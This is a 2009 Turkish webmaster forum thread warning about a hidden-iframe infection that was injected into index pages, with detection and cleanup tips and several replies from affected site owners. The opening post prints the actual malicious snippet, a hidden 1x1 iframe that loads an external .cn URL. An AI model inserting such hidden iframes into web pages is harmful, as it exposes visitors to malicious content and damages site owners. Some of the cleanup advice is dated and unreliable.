• 16-04-2009, 18:36:32
    #1
    TÜM WEBMASTER ARKADAŞLARIMIN DİKKATİNE

    Daha önce böyle bir Virüs kodu ile karşılaşmadığım için Forumdaki Webmaster arkadaşlarımı bilgilendirmek istedim.

    - Yaklaşık olarak 5 gündür 2k olan sitemin günlük hiti 600-700 tekil hit seviyesine geldi. Buda doğal olarak canımı sıktı.
    - Bunun nedeni ne olabilir diye araştırırken daha önce hiç rastlamadığım ve ilk kez gördüğüm bir Virüs kodunun sitemin index`ine girmiş oldugunu farkettim.
    - Kodu kaldırdıktan sonra sitemin günlük hitti eski seviyesine tekrar ulaştı.

    Gözlemlediğim başka bir zararıda bu 5 gün öncesine kadar belli başlı aramalarada 1. sayfada olan alt sayfalarım nedenini bilmediğim bir şekilde ilgili aramalaradan komple yok olmuşlardı. Kodu kaldırdıktan 2 saat sonra bu sayfalarım tekrar eski yerlerine geldiler.

    *** Bu Virüs`ün Zararları ***

    - Sitenizi aramalarda geriletebilir.
    - Sitenize gelen ziyaretçinin virus programında uyarı çıkartarak ziyaretçiyi siteden uzak tutar.
    - Sitenizi "badware" uyarısı alarak hitinizi azaltır.
    - Google'ın gözünde Trustrank'ınız düşer.

    *** Virüs`ün Etkili Olduğu Alanlar ***

    - Virüs " İndex.htm - İndex.html - İndex.php - home.php - default.php adlı Sayfalara Rahatlıkla Bulaşabiliyor.

    *** Virüs Siteme Bulaşmışsa Nasıl Bulabilirim ***

    - Virüs Sitenize Bulaşmışsa Yukarıda Belirttiğim Etkili Olduğu Alanlar`daki Sayfaların İçinde " iframe " Olarak Aratma Yapınız.
    - Bu Aratma Sonuçunda Siteniz İle Alakası Olmayan " iframe " Kodu Bulursanız Hemen Siliniz.

    *** Virüs`ü Nasıl Temizlerim ***

    - Öncelikle Etkili Olduğu Alanlar`daki Sayfalarda Bu Virüs`e Rastlarsanız, Virüs Kodunu Sayfadan Çıkarıp Temiz Dosyalarınızı Ftp`ye Atınız.
    - Sonra Ftp Şifrelerinizi Değiştiriniz.
    - Bu İşlemleri " Filezilla - Cute Ftp " Gibi Ftp Şifrenizi Kayıt Altında Tutan Ftp Programları İle Yapmayınız.
    - Ftp`nize Explorer İle Bağlantı Yapınız.
    - Explorer İle Bağlantı İçin ( ftp://siteadi@siteadi.com ) Komutunu Kullanın. Karşınıza Panel Çıkacaktır.
    - Tüm Bu İşlemlerden Sonra Bilgisayarınıza Virüs Taraması Yaparak Temizleyiniz.
    - Bu İşlemlerin Sonunda Virüs Hala Sitenize Geliyorsa, Aynı İşlemleri Baştan Yapın ama Bu Sefer Virüs Taraması Yerine Bilgisayarınıza " Format " Atınız.

    Bu Konuyu Sadece Bilgilendirme Amaçlı Yazdım. Başınıza Böyle Bir Şey Gelirse Bilginiz Olsun Diye.

    Saygılar...

    İşte O Kod :
    <iframe src="http://perfectnamestore.cn/in.cgi?income7" width=1 height=1 style="visibility: hidden"></iframe>
  • 16-04-2009, 18:37:58
    #2
    Üyeliği durduruldu
    ilginç bişey
  • 16-04-2009, 18:38:20
    #3
    kontrol edeceğim hemen konu için teşk.ler
  • 16-04-2009, 18:39:51
    #4
    Birkaç gün daha kaldırmasaydınız, siteniz zararlı olarak etiketlenirdi. Geçmiş olsun.
  • 16-04-2009, 18:50:42
    #5
    Üyeliği durduruldu
    zararlı olarak etkilemesi dışında bu kodda sitenin boyutunu büyütme var yani o frame kendini otomatik olarak büyütor. belli saatlerde bunu yapıyor. özellikle yurt dışı iplerinde bunu her zaman yapıyor. yani kendi istediği amaca hittinizi aktarıyor. ve google da bu kodu gördüğü için zararlı yapmıyor. artık google bu iframeden büyüme yapan kodları görüyor. ve kaldırdıgı zaman site sahibi incelemesini sürekli yaptıgından yeniden eski yerine alıyor. tabikide bu incelemeyi kaç saatte bir yapıyor ve ne zamandan sonra yapmıyor derseniz bilgim yok. ama yurt dısında herkes bu koddan şikayetci bizim türkiyede ise bunun zararı sadece hit olarak görünüyor asıl amacı yurt dısı hitti almaktır. iyigünler
  • 16-04-2009, 18:55:13
    #6
    Bir ara ftpler yüzünden bulaşıyordu belkide öyle bulaşmıştır.Hocam kullandığınız script ne idi?
  • 16-04-2009, 18:59:22
    #7
    erhanby adlı üyeden alıntı: mesajı görüntüle
    Bir ara ftpler yüzünden bulaşıyordu belkide öyle bulaşmıştır.Hocam kullandığınız script ne idi?
    Wordpress Kullandığım Siteye Bulaştı.
  • 16-04-2009, 19:01:54
    #8
    Lanet olsun ya bende bugün farkettim kodu demek bundan 15 gündür 5kdan 500e düştüm. Bugün açarken bi kaç sayfayla birlikte açıyodum durum çubuğundan farkettim. Resmi sitelere bile atmışlar bu kodu biraz araştırdım. Bundan nasıl korunabiliriz ? Tüm güvenlik önlemleri var şok oldum görünce admin panelime giremezler aynı şekilde control panelede. Benim aklıma tek bi yöntem geliyor virüsü pcye yükleyip oradan ftp programını açtığımızda şifreyi vs. kayıt edip atmış olabilirler sen hangi programı kullanıyorsun ?
  • 16-04-2009, 19:06:00
    #9
    evet bu iframe virüsü ile bende karşılaştım 4 gün boyunca silmekle uğraştım, kod kendini index ile başlayan tüm sayfalara atıyor ben siliyorum bir gün geçiyor/geçmiyor kendini tekrar yazıyor, en son çağre virüsün bulaştığı index ile başlayan dosyaları yenileriyle değiştirmem oldu... Şuan için o frame kodunu görmüyorum sayfalarımda ancak hitimde hala bir düzelme yok.